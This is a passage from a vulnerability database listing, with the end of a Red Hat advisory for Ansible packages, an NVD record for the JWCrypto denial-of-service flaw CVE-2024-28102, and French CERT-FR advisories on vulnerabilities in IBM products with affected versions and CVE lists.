"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "requests: subsequent requests to the same host ignore cert verification"
}
]
}
fkie_cve-2024-28102
Vulnerability from fkie_nvd
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f | ||
| security-advisories@github.com | https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97 | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html | ||
| af854a3a-2127-422b-91ae-364da2661108 | https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103 |
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
},
{
"lang": "es",
"value": "JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token."
}
],
"id": "CVE-2024-28102",
"lastModified": "2024-11-21T09:05:49.187",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2024-03-21T02:52:23.513",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
CERTFR-2024-AVI-0385
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une élévation de privilèges et un déni de service à distance.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
None| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Sterling Connect:Direct | IBM Sterling Connect:Direct Web Services (Certified Container) toutes versions sans le dernier correctif de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.2.x antérieures à 6.2.0.23 | ||
| IBM | N/A | AIX et VIOS sans le dernier correctif de sécurité | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions antérieures à 6.1.0.24 | ||
| IBM | QRadar | SOAR QRadar Plugin App versions antérieures à 5.4.0 | ||
| IBM | Sterling Connect:Direct | Sterling Connect:Direct Web Services versions 6.3.x antérieures à 6.3.0.7 | ||
| IBM | QRadar SIEM | QRadar SIEM versions 7.5.x antérieures à 7.5.0 UP8 IF02 |
| Title | Publication Time | Tags | |||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "IBM Sterling Connect:Direct Web Services (Certified Container) toutes versions sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.2.x ant\u00e9rieures \u00e0 6.2.0.23",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "AIX et VIOS sans le dernier correctif de s\u00e9curit\u00e9",
"product": {
"name": "N/A",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions ant\u00e9rieures \u00e0 6.1.0.24",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "SOAR QRadar Plugin App versions ant\u00e9rieures \u00e0 5.4.0",
"product": {
"name": "QRadar",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Sterling Connect:Direct Web Services versions 6.3.x ant\u00e9rieures \u00e0 6.3.0.7",
"product": {
"name": "Sterling Connect:Direct",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "QRadar SIEM versions 7.5.x ant\u00e9rieures \u00e0 7.5.0 UP8 IF02",
"product": {
"name": "QRadar SIEM",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2024-20919",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20919"
},
{
"name": "CVE-2023-21938",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21938"
},
{
"name": "CVE-2023-1382",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1382"
},
{
"name": "CVE-2023-4732",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4732"
},
{
"name": "CVE-2022-48564",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48564"
},
{
"name": "CVE-2023-6681",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6681"
},
{
"name": "CVE-2023-3138",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3138"
},
{
"name": "CVE-2023-46813",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46813"
},
{
"name": "CVE-2023-46218",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46218"
},
{
"name": "CVE-2023-1838",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1838"
},
{
"name": "CVE-2024-27273",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27273"
},
{
"name": "CVE-2023-28328",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28328"
},
{
"name": "CVE-2023-51043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51043"
},
{
"name": "CVE-2023-5633",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5633"
},
{
"name": "CVE-2023-52425",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52425"
},
{
"name": "CVE-2022-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38457"
},
{
"name": "CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"name": "CVE-2022-45688",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45688"
},
{
"name": "CVE-2022-26691",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26691"
},
{
"name": "CVE-2023-21939",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21939"
},
{
"name": "CVE-2024-20926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20926"
},
{
"name": "CVE-2023-5178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5178"
},
{
"name": "CVE-2023-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50868"
},
{
"name": "CVE-2023-6536",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6536"
},
{
"name": "CVE-2023-23455",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-23455"
},
{
"name": "CVE-2020-10001",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-10001"
},
{
"name": "CVE-2024-0646",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0646"
},
{
"name": "CVE-2021-33503",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33503"
},
{
"name": "CVE-2023-40283",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-40283"
},
{
"name": "CVE-2022-45884",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45884"
},
{
"name": "CVE-2023-50782",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50782"
},
{
"name": "CVE-2007-4559",
"url": "https://www.cve.org/CVERecord?id=CVE-2007-4559"
},
{
"name": "CVE-2023-33951",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33951"
},
{
"name": "CVE-2024-28102",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28102"
},
{
"name": "CVE-2023-2163",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2163"
},
{
"name": "CVE-2022-42895",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42895"
},
{
"name": "CVE-2024-22361",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22361"
},
{
"name": "CVE-2024-20921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20921"
},
{
"name": "CVE-2022-40133",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40133"
},
{
"name": "CVE-2023-4807",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4807"
},
{
"name": "CVE-2023-28322",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28322"
},
{
"name": "CVE-2023-45862",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45862"
},
{
"name": "CVE-2023-1989",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1989"
},
{
"name": "CVE-2020-3898",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-3898"
},
{
"name": "CVE-2023-44487",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44487"
},
{
"name": "CVE-2023-1855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1855"
},
{
"name": "CVE-2018-20060",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-20060"
},
{
"name": "CVE-2023-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-25193"
},
{
"name": "CVE-2022-45869",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45869"
},
{
"name": "CVE-2023-2513",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2513"
},
{
"name": "CVE-2023-22081",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22081"
},
{
"name": "CVE-2023-20569",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-20569"
},
{
"name": "CVE-2023-4206",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4206"
},
{
"name": "CVE-2023-6817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6817"
},
{
"name": "CVE-2023-31084",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31084"
},
{
"name": "CVE-2023-5072",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5072"
},
{
"name": "CVE-2022-45919",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45919"
},
{
"name": "CVE-2019-13224",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-13224"
},
{
"name": "CVE-2022-41858",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41858"
},
{
"name": "CVE-2023-3611",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3611"
},
{
"name": "CVE-2023-4128",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4128"
},
{
"name": "CVE-2023-31436",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-31436"
},
{
"name": "CVE-2023-1074",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1074"
},
{
"name": "CVE-2019-19204",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19204"
},
{
"name": "CVE-2023-42753",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42753"
},
{
"name": "CVE-2023-4921",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4921"
},
{
"name": "CVE-2023-33203",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33203"
},
{
"name": "CVE-2023-3812",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3812"
},
{
"name": "CVE-2023-32360",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32360"
},
{
"name": "CVE-2023-27043",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-27043"
},
{
"name": "CVE-2024-27269",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27269"
},
{
"name": "CVE-2021-43975",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43975"
},
{
"name": "CVE-2023-4207",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4207"
},
{
"name": "CVE-2018-19787",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19787"
},
{
"name": "CVE-2023-22067",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22067"
},
{
"name": "CVE-2023-6356",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6356"
},
{
"name": "CVE-2024-1488",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1488"
},
{
"name": "CVE-2024-22195",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22195"
},
{
"name": "CVE-2023-1252",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1252"
},
{
"name": "CVE-2023-44794",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44794"
},
{
"name": "CVE-2022-3545",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3545"
},
{
"name": "CVE-2023-2176",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2176"
},
{
"name": "CVE-2023-2162",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2162"
},
{
"name": "CVE-2023-1079",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1079"
},
{
"name": "CVE-2022-36402",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-36402"
},
{
"name": "CVE-2023-33952",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33952"
},
{
"name": "CVE-2023-32324",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-32324"
},
{
"name": "CVE-2023-36478",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-36478"
},
{
"name": "CVE-2014-3146",
"url": "https://www.cve.org/CVERecord?id=CVE-2014-3146"
},
{
"name": "CVE-2023-45803",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45803"
},
{
"name": "CVE-2023-3772",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3772"
},
{
"name": "CVE-2022-4744",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-4744"
},
{
"name": "CVE-2023-3161",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3161"
},
{
"name": "CVE-2023-35824",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35824"
},
{
"name": "CVE-2023-45871",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45871"
},
{
"name": "CVE-2023-1998",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1998"
},
{
"name": "CVE-2023-28772",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28772"
},
{
"name": "CVE-2022-40982",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-40982"
},
{
"name": "CVE-2019-16163",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16163"
},
{
"name": "CVE-2023-1786",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1786"
},
{
"name": "CVE-2023-1075",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1075"
},
{
"name": "CVE-2023-3609",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3609"
},
{
"name": "CVE-2023-38325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38325"
},
{
"name": "CVE-2023-4155",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4155"
},
{
"name": "CVE-2023-4208",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4208"
},
{
"name": "CVE-2023-35823",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-35823"
},
{
"name": "CVE-2019-9740",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-9740"
},
{
"name": "CVE-2023-26545",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-26545"
},
{
"name": "CVE-2022-3640",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3640"
},
{
"name": "CVE-2022-45887",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-45887"
},
{
"name": "CVE-2023-6535",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6535"
},
{
"name": "CVE-2024-26130",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26130"
},
{
"name": "CVE-2023-21937",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21937"
},
{
"name": "CVE-2019-19203",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19203"
},
{
"name": "CVE-2023-1118",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1118"
},
{
"name": "CVE-2023-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-43804"
},
{
"name": "CVE-2023-33850",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33850"
},
{
"name": "CVE-2023-2597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2597"
},
{
"name": "CVE-2022-48560",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48560"
},
{
"name": "CVE-2022-3594",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3594"
},
{
"name": "CVE-2023-34241",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-34241"
},
{
"name": "CVE-2022-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38096"
},
{
"name": "CVE-2023-4622",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4622"
},
{
"name": "CVE-2019-8696",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8696"
},
{
"name": "CVE-2020-26137",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26137"
},
{
"name": "CVE-2019-11324",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11324"
},
{
"name": "CVE-2023-3141",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3141"
},
{
"name": "CVE-2022-28388",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-28388"
},
{
"name": "CVE-2023-30456",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-30456"
},
{
"name": "CVE-2023-2004",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2004"
},
{
"name": "CVE-2023-5676",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5676"
},
{
"name": "CVE-2023-6606",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6606"
},
{
"name": "CVE-2019-11236",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-11236"
},
{
"name": "CVE-2023-6932",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6932"
},
{
"name": "CVE-2023-0458",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0458"
},
{
"name": "CVE-2023-21968",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21968"
},
{
"name": "CVE-2023-1073",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1073"
},
{
"name": "CVE-2023-3212",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3212"
},
{
"name": "CVE-2021-33631",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33631"
},
{
"name": "CVE-2023-50387",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50387"
},
{
"name": "CVE-2024-0985",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0985"
},
{
"name": "CVE-2024-20932",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20932"
},
{
"name": "CVE-2022-48624",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48624"
},
{
"name": "CVE-2023-21930",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21930"
},
{
"name": "CVE-2024-20918",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20918"
},
{
"name": "CVE-2023-0597",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0597"
},
{
"name": "CVE-2023-6546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6546"
},
{
"name": "CVE-2023-7192",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7192"
},
{
"name": "CVE-2023-4132",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4132"
},
{
"name": "CVE-2024-1086",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1086"
},
{
"name": "CVE-2023-1206",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1206"
},
{
"name": "CVE-2024-0565",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-0565"
},
{
"name": "CVE-2019-8675",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-8675"
},
{
"name": "CVE-2023-4623",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-4623"
},
{
"name": "CVE-2023-51042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-51042"
},
{
"name": "CVE-2023-0590",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-0590"
},
{
"name": "CVE-2024-20945",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20945"
},
{
"name": "CVE-2023-3268",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3268"
},
{
"name": "CVE-2023-21967",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-21967"
},
{
"name": "CVE-2023-5717",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-5717"
},
{
"name": "CVE-2019-19012",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-19012"
},
{
"name": "CVE-2020-27783",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-27783"
},
{
"name": "CVE-2024-20952",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-20952"
},
{
"name": "CVE-2021-43818",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43818"
},
{
"name": "CVE-2021-43618",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43618"
},
{
"name": "CVE-2023-2166",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-2166"
},
{
"name": "CVE-2023-1192",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1192"
},
{
"name": "CVE-2023-6931",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6931"
},
{
"name": "CVE-2023-6610",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-6610"
}
],
"initial_release_date": "2024-05-10T00:00:00",
"last_revision_date": "2024-05-10T00:00:00",
"links": [],
"reference": "CERTFR-2024-AVI-0385",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2024-05-10T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans \u003cspan\nclass=\"textit\"\u003eles produits IBM\u003c/span\u003e. Certaines d\u0027entre elles\npermettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire\n\u00e0 distance, une \u00e9l\u00e9vation de privil\u00e8ges et un d\u00e9ni de service \u00e0\ndistance.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150297 du 06 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150297"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150684 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150684"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150803 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150803"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150277 du 05 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150277"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150196 du 03 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150196"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150798 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150798"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150804 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150804"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150799 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150799"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150276 du 05 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150276"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150802 du 09 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150802"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7150362 du 07 mai 2024",
"url": "https://www.ibm.com/support/pages/node/7150362"
}
]
}
CERTFR-2024-AVI-0579
Vulnerability from certfr_avis
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Spectrum | Spectrum Control versions antérieures à 5.4.12 | ||
